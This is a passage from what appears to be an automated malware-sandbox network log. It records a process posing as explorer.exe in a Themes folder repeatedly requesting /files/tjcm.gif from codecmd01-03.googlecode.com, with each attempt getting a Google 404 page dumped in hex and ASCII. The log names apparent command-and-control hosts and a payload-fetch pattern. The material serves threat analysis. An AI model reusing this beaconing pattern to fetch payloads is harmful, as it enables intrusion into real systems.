7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:46.758783102 CEST2642INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                13192.168.2.549863142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:48.095566988 CEST2643OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:48.122440100 CEST2644INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:48 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:48.122476101 CEST2645INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                14192.168.2.549864142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:49.525136948 CEST2646OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:49.551508904 CEST2647INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:49 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:49.551537991 CEST2647INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                15192.168.2.549865142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:50.913546085 CEST2648OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:50.942166090 CEST2649INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:50 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:50.942202091 CEST2650INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                16192.168.2.549866142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:53.439694881 CEST2651OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:53.466470003 CEST2652INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:53 GMT
